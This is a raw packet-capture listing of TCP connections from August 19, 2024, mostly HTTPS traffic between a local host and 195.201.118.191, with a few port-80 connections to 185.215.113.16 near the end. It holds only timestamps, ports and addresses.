Aug 19, 2024 06:06:19.900304079 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:19.902544975 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:19.920676947 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:19.920691967 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:19.920833111 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:19.920846939 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:19.922561884 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:19.936131001 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:19.936146975 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:19.936270952 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:19.936285973 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:19.940565109 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:19.954478025 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:19.954494953 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:19.954929113 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:19.954943895 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:19.960585117 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:19.972476006 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:19.972516060 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:19.972539902 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:19.972557068 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:19.972582102 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:19.975541115 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:19.986722946 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:19.986740112 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:19.986869097 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:19.986882925 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:19.987541914 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.002696037 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.002712965 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.002882004 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.002897024 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.004594088 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.015121937 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.015136957 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.015285015 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.015300035 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.016540051 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.023823023 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.023838043 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.023921967 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.023930073 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.024051905 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.033843040 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.033858061 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.033950090 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.033958912 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.034356117 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.042305946 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.042330027 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.042525053 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.042531967 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.046490908 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.050724983 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.050745964 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.050808907 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.050816059 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.050884962 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.050884962 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.061441898 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.061456919 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.061610937 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.061634064 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.064557076 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.072722912 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.072738886 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.072869062 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.072875023 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.076550007 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.086354017 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.086369038 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.086494923 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.086502075 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.088532925 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.099818945 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.099833965 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.099968910 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.099976063 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.100487947 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.111673117 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.111692905 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.111728907 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.111736059 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.111768961 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.111788988 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.120115995 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.120129108 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.120173931 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.120186090 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.120214939 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.120234013 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.129488945 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.129503012 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.129555941 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.129564047 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.129602909 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.136841059 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.136856079 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.136897087 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.136904955 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.136934042 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.136950016 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.145241022 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.145256042 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.145311117 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.145319939 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.145363092 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.156621933 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.156636953 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.156692982 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.156702995 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.156744003 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.175371885 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.175400972 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.175441980 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.175450087 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.175501108 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.189409018 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.189426899 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.189476013 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.189483881 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.189517975 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.189541101 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.201576948 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.201598883 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.201642990 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.201648951 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.201680899 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.201694012 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.213345051 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.213376045 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.213414907 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.213423967 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.213454008 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.213478088 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.222829103 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.222846031 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.222882986 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.222888947 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.222918987 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.222937107 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.225667953 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.225683928 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.225739002 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.225747108 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.225771904 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.225794077 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.245016098 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.245038033 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.245079994 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.245085001 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.245115042 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.245134115 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.246634960 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.246651888 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.246701002 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.246707916 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.246722937 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.246747971 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.264152050 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.264185905 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.264224052 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.264230967 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.264257908 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.264276981 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.294965982 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.295000076 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.295041084 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.295058012 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.295083046 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.295099020 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.295381069 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.295401096 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.295429945 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.295440912 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.295461893 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.295485020 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.302093029 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.302113056 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.302149057 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.302162886 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.302186966 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.302202940 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.311702013 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.311729908 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.311772108 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.311789036 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.311820984 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.311836004 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.314871073 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.314891100 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.314939022 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.314949036 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.314986944 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.334216118 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.334239960 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.334295988 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.334311962 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.334358931 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.335556984 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.335578918 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.335609913 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.335625887 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.335643053 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.335669994 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.363030910 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.363065004 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.363106966 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.363127947 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.363162994 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.363182068 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.378820896 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.378849983 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.378895044 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.378916025 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.378950119 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.378964901 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.380740881 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.380755901 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.380808115 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.380824089 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.380860090 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.391423941 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.391439915 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.391494989 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.391515017 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.391556025 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.391576052 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.400536060 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.400556087 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.400624990 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.400645018 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.400688887 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.403449059 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.403475046 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.403517008 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.403525114 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.403579950 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.423487902 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.423513889 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.423573017 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.423594952 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.423620939 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.423641920 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.424097061 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.424127102 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.424174070 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.424180031 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.424211979 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.424230099 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.451967001 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.451994896 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.452059984 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.452089071 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.452137947 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.467698097 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.467725039 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.467784882 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.467792988 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.467817068 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.467834949 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.469604969 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.469621897 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.469676018 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.469681978 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.469707966 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.469726086 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.479954004 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.479970932 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.480011940 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.480034113 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.480048895 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.480071068 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.489334106 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.489355087 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.489394903 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.489403009 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.489429951 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.489449978 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.492568970 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.492584944 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.492635965 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.492643118 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.492683887 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.512478113 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.512521982 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.512554884 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.512576103 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.512600899 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.512619972 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.513535976 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.513556957 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.513590097 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.513601065 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.513627052 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.513644934 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.534248114 CEST	80	49892	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:20.534310102 CEST	49892	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:20.537930965 CEST	49892	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:20.538429976 CEST	49893	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:20.540930033 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.540951967 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.541004896 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.541029930 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.541054964 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.541071892 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.543092966 CEST	80	49892	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:20.543143034 CEST	49892	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:20.543229103 CEST	80	49893	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:20.543292046 CEST	49893	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:20.543519974 CEST	49893	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:20.548252106 CEST	80	49893	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:20.556655884 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.556673050 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.556726933 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.556746006 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.556778908 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.568469048 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.568497896 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.568535089 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.568556070 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.568572998 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.568602085 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.569252968 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.569268942 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.569322109 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.569329023 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.569354057 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.569361925 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.578593969 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.578610897 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:20.578665018 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:20.578671932 CEST	443	49890	195.201.118.191	192.168.2.4
